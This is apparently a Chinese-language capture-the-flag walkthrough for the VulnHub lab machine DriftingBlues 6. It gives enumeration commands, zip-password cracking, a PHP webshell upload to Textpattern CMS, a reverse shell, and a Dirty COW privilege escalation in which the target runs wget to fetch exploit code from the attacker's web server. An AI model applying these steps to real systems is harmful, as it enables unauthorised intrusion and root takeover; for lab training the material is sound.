一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:driftingblues6(10.0.2.22)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-6,672/
二、信息收集
使用nmap主机发现靶机ip:10.0.2.22
使用nmap端口扫描发现靶机开放端口:80
打开网站没有发现可以利用的功能点,查看源码未发现隐藏数据
使用dirsearch工具爆破目录
dirsearch -u http://10.0.2.22/ 
dirsearch -u http://10.0.2.22/textpattern/ 
dirsearch -u http://10.0.2.22/textpattern/textpattern/
访问/robots.txt
User-agent: *
Disallow: /textpattern/textpattern
dont forget to add .zip extension to your dir-brute
;)访问/textpattern/README可以看到该网站为Textpattern CMS版本为4.8.3
根据提示使用dirbuster工具进行目录爆破,爆破.zip
获取爆破得到的zip文件,解压,发现需要输入密码
使用fcrackzip工具进行暴力破解,得到密码:myspace4
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u spammer.zip 
将压缩文件解压,得到用户名密码:mayer:lionheart
尝试登录网站,登录成功
三、漏洞利用
登录网站,查看网站各个功能点,发现存在文件上传功能,直接上传php webshell,上传成功
查看之前爆破的目录,有一个/textpattern/files/上传的webshell就放在在里面
直接访问webshell,反弹shell成功
四、提权
获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
查看靶机系统内核版本uname -a,发现版本为:Linux 3.2.0-4
并且发现该靶机存在gcc环境which gcc
可以使用脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。
在主机开启web服务,并在靶机下载提权脚本
攻击机:
service apache2 start
靶机:
wget http://10.0.2.15/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty创建一个具有root权限的用户firefart,密码为你自己设置的密码:firefart\root
切换为firefart用户
获取flag,只发现了一个flag
